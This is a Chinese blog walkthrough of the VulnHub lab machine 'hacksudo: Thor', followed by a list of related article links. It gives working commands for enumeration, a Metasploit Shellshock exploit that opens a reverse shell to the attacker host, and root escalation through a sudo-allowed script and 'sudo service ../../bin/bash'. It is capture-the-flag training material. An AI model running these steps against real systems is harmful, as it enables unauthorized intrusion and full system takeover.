VulnHUb日记(十):Hacksudo:Thor

最新推荐文章于 2024-02-11 22:49:21 发布
最新推荐文章于 2024-02-11 22:49:21 发布
阅读量1.1k 收藏
点赞数
分类专栏: VlunHub日记 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/120509575
版权

靶机介绍

虚拟机链接:hacksudo: Thor ~ VulnHub

参考博客:Hacksudo Thor Walkthrough - Vulnhub - Security - NepCodeX

开始练习

本机ip:192.168.56.102

虚拟机ip:192.168.56.124

使用netdiscover寻找ip地址

netdiscover -r 192.168.56.0/24

 使用nmap扫描开放端口

nmap -A 192.168.56.124

 开放21,22,80端口,查看80端口

 使用dirsearch枚举目录

dirsearch  -e txt,bak,zip,img,jpg,php,html,js -u http://192.168.56.124

逐个查看,在news.php中发现提示cig-bin,根据博客提示这里有可能有漏洞可以利用,于是枚举该目录下文件,发现shell.sh

 

dirsearch http://192.168.56.124/cgi-bin

使用msf工具,成功获得shell

msfconsole
search shellshock
use 1
show options
set RHOSTS 192.168.56.124
set TARGETURI /cgi-bin/shell.sh
set LHOST 192.168.56.102
set LPORT 4396
run
shell

 

 发现可以用thor的用户免密root执行hammer.sh 

sudo -l

id

 

 该shell文件可以执行输入的指令,于是使用“bash"获取thor的shell并优化

sudo -u thor /home/thor/./hammer.sh
bash
SHELL=/bin/bash script -q /dev/null ## 优化

sudo -l

 可以直接利用该指令进行service提权

参考链接:service | GTFOBins

sudo service ../../bin/bash

成功提权

Dawn_Xiiii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thor:Thor是我们公司的机器人
07-18
您可以通过运行以下命令在本地启动 Thor: % bin/hubot 你会看到一些关于你的脚本来自哪里的启动输出和一个提示: [Sun, 04 Dec 2011 18:41:11 GMT] INFO Loading adapter shell [Sun, 04 Dec 2011 18:41:11 ...
thor:WebSocket雷神
04-01
雷神ThorWebSocket基准测试/负载生成器。 HTTP服务器有很多基准测试工具。 您有AB,攻城,WRK等更多内容。 但是所有这些工具仅适用于普通ol HTTP,并且不支持WebSockets-即使它们不适合,因为它们将测试短时间运行...
Vulnhub_HACKSUDO: THOR
qq_45434762的博客
09-04 718
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
hacksudo-ThorVulnhub
wcl20010的博客
05-26 687
靶机地址:hacksudo: Thor ~ VulnHub 利用的技术 shellshock破壳漏洞<–cgi-bin–> GTFOBins提权 github开源源码泄露 什么是破壳漏洞? bash环境变量 var="hello world" //一个简单的环境变量 =前后不能有空格 使用它输入命令: echo $var //输出就是你定义的内容 如果此时再输入bash 那么得到的就是bash的子进程 -》var就不能访问了:echo $var 子进程可以访问
vulnhubhacksudo:Thor
weixin_54431413的博客
05-24 569
前期:主机发现端口扫描,服务版本探测, 中期:信息收集,通过源码发现管理员默认密码,发现逻辑漏洞,sql注入等 后期:通过cgi程序利用破壳漏洞成功突破边界,最后利用一些命令配置不当实现成功提权。 此篇最重要的一点就是破壳漏洞和系统逻辑漏洞, 要迟到了,上课去了
靶机渗透练习96-hacksudoThor
hirak0的博客
05-09 1630
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-thor,733/ Description Box created by vishal Waghmare This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server ( https://discord.gg/kDyAKtJs ) Website (https://hacksud
thor:雷神
03-18
** thor **是一个C ++帮助程序库,为深度学习提供了巨大的实用程序,算法和可视化功能。我们建议从github来源安装,因为我们会大量更新新的API。但是* thor *将始终与旧版本兼容,它安全可靠地集成到您的项目中并...
thor:泰坦引擎
03-31
"thor:泰坦引擎" 是一个以"泰坦"为代号的高性能计算平台或软件引擎,可能专用于处理大规模数据处理、图形渲染、物理模拟等任务。由于提供的信息有限,我们将根据常见的情况和假设来探讨这个主题。 在IT行业中,引擎...
Thor:DIY 3D可打印机械臂
05-28
Thor是具有六个自由度的开源可打印机械臂。 其配置(偏航-偏航-偏航-偏航-偏航)与当前市场上大多数机械手机器人所使用的配置相同。 在直立位置,雷神(Thor)约为625毫米,它可以提起重达750克的物体。 该项目于...
hack_fish_sudo:这是我尝试过的一种方法,可以让您借助别名在鱼控制台中获取sudo密码。 该脚本是用python制作的。 PS我不是一个确切的PHD所有者,所以不要盯着我的代码太久,因为我知道这很糟糕
03-26
hack_fish_sudo 这是我尝试过的一种方法,可以让您借助别名在鱼控制台中获取sudo密码。 该脚本是用python制作的。 PS我不是一个确切的PHD所有者,所以不要盯着我的代码太久,因为我知道这很糟糕
vulnhub靶场-hacksudo - Thor
qq_42947816的博客
06-30 984
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
VulnHub日记(二):Hacksudo: ProximaCentauri
Dawn_Xi的博客
08-04 333
靶机介绍 由 hacksudo 团队成员 vishal Waghmare, Soham Deshmukh 创建的,应该易于中等难度。 这个盒子是为了提高 Linux 特权升级和 CMS 技能而创建的。 找到 root.txt 标志将其提交到 Discord 上的标志提交频道,并有机会免费获得 hacksudo 机器黑客课程。 参考文章链接: 博客:https://nepcodex.com/2021/06/hacksudo-proximacentauri-walkthrough-vulnhub-wr
VnlnHub hacksudo-Thor
weixin_45682839的博客
10-08 484
涉及知识包括:端口服务探测、敏感目录收集、后台弱口令、SQL注入、逻辑漏洞、破壳漏洞、linux本地提权等。
vulnhub-->hacksudo-Thor靶机详细思路
最新发布
woshicainiao666的博客
02-11 854
Shellshock漏洞的原因是Bash解释器在处理特定的环境变量时存在一个安全漏洞,攻击者可以通过构造恶意的环境变量来执行任意的Shell命令。破壳漏洞(Shellshock)是指一个影响Unix和Linux操作系统的严重安全漏洞,它影响了Bash命令解释器。该漏洞使攻击者能够在受影响的系统上执行任意代码,从而可能导致系统被入侵。sudo -l 发现可执行文件/home/thor/./hammer.sh,执行,发现输入的命令,会以thor用户执行,所以执行bash,以Thor用户新开一个bash环境。
vulnhub -- hacksudo: Thor
weixin_46107179的博客
05-06 310
靶机下载地址:下载链接 这里通过arp-scan -l来发现主机,主机IP地址:10.0.2.7 信息搜集 namp对IP地址进行端口扫描(开放21,22,82端口) 通过80端口访问,首页是一个登录页面,尝试用弱密码进行登录一下,发现不能登录成功 接着访问一下其他页面,发现concat下有一些基本信息(可以搜集尝试登录,但无果),其他页面也没有什么有用信息 接下来用dirsearch进行目录扫描,可以发现有一些文件可以访问 README.md以及还有一个后台登录页面 查看README.md文件,发
Vulnhub靶机:hacksudo-Thor
qq_48904485的博客
02-09 952
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudo-Thor(10.0.2.49)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/hacksudoThor.zip。
Vulnhub_hacksudo-search
qq_45434762的博客
05-09 915
主机信息kali: 192.168.1.10 hacksudo-search: 192.168.1.9 信息收集通过信息收集发信目标追击开发22、80两个端口nmap -T4 -A -v ...
hacksudo: L.P.E.
wanguixiu的博客
06-10 374
hacksudo: L.P.E. 作者: admin 时间: 2021-06-03 分类: vulnhub靶场 step1.存活主机探测,使用"fping -g 192.168.3.0/24"扫描,结果如下,1是网关,129是kali,目标主机是133step2.端口扫描,使用"nmap -A -p 1-65535 -v 192.168.3....
autotest@thor2:~$ java -version -bash: /usr/bin/java: No such file or directory
12-08
根据提供的引用内容,错误信息表明系统找不到Java可执行文件。这可能是因为Java未正确安装或未正确配置环境变量所致。您可以按照以下步骤检查和解决问题: 1. 确认Java是否已正确安装。您可以在终端中输入以下命令来检查Java版本: ```shell java -version ``` 如果Java已正确安装,则应该会显示Java版本信息。否则,您需要安装Java。 2. 如果Java已正确安装,则可能是环境变量未正确配置所致。您可以按照以下步骤配置环境变量: - 打开终端并输入以下命令: ```shell sudo nano /etc/environment ``` - 在打开的文件中,将以下行添加到文件末尾: ```shell JAVA_HOME="/path/to/java" PATH=$PATH:$JAVA_HOME/bin ``` 其中,/path/to/java是Java安装路径。例如,如果Java安装在/usr/lib/jvm/java-8-openjdk-amd64,则应将上述行更改为: ```shell JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64" PATH=$PATH:$JAVA_HOME/bin ``` - 保存并关闭文件,然后重新启动终端。 3. 如果上述步骤都无法解决问题,则可能需要重新安装Java。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值